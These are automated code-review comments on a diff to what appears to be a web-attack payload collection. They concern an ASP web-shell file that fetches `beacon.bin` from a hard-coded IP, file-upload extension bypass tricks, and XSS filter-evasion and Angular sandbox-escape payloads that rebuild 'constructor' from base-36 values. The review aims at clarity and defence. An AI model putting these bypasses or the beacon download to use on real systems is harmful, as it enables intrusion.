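Review bot: `Upload Insecure Files/Extension ASP/shell.soap` hard-codes `http://10.90.255.52/beacon.bin` with only a trailing comment saying "your IP"; use an unmistakable placeholder such as `http://CHANGEME/beacon.bin` so the address is never mistaken for a live indicator when the file is scanned or quoted. In the README, the `shell.soap` entry appended to the ASP server line carries no IIS version or handler condition like its neighbours, and the new `[IIS - SOAP](...)` reference lacks the author and date the other references carry.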
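Review bot: In the Upload README tricks hunk, replacing "Mix uppercase and lowercase" with "Random uppercase and lowercase" reads worse; "Mixed case" is clearer. While this list is being touched, the unchanged context line "will became `name.gpj.php`" should read "will become", and the new `Slash:` bullet would benefit from the same kind of qualifier the RTLO and multiple-dots bullets have (which server or parser the trailing `/` and `.\` affect).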
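Review bot: In the XSS Injection hunk at line 663, the ```` ```javascript ```` fence and `window["doc"+"ument"]` are dropped right after the IP-to-decimal text with no heading or sentence saying what they illustrate (reaching a property by concatenating its name so a signature filter does not match the literal), and the block opens with a stray blank line; also verify the fence nesting, because the new opening fence lands immediately before an existing closing fence in the context.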
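Review bot: In XSS in Angular.md the four new payloads are undocumented; a one-line note that `x.toString(36)+y.toString(36)` rebuilds the string `"constructor"` (767015343 is `constr` and 50986827 is `uctor` in base 36), and that the variants differ only in `fromCharCode` vs `fromCodePoint` and `b={}`/`b[a]` vs `a.sub.__proto__`, would spare readers from decoding them and gives defenders the literal value to watch for.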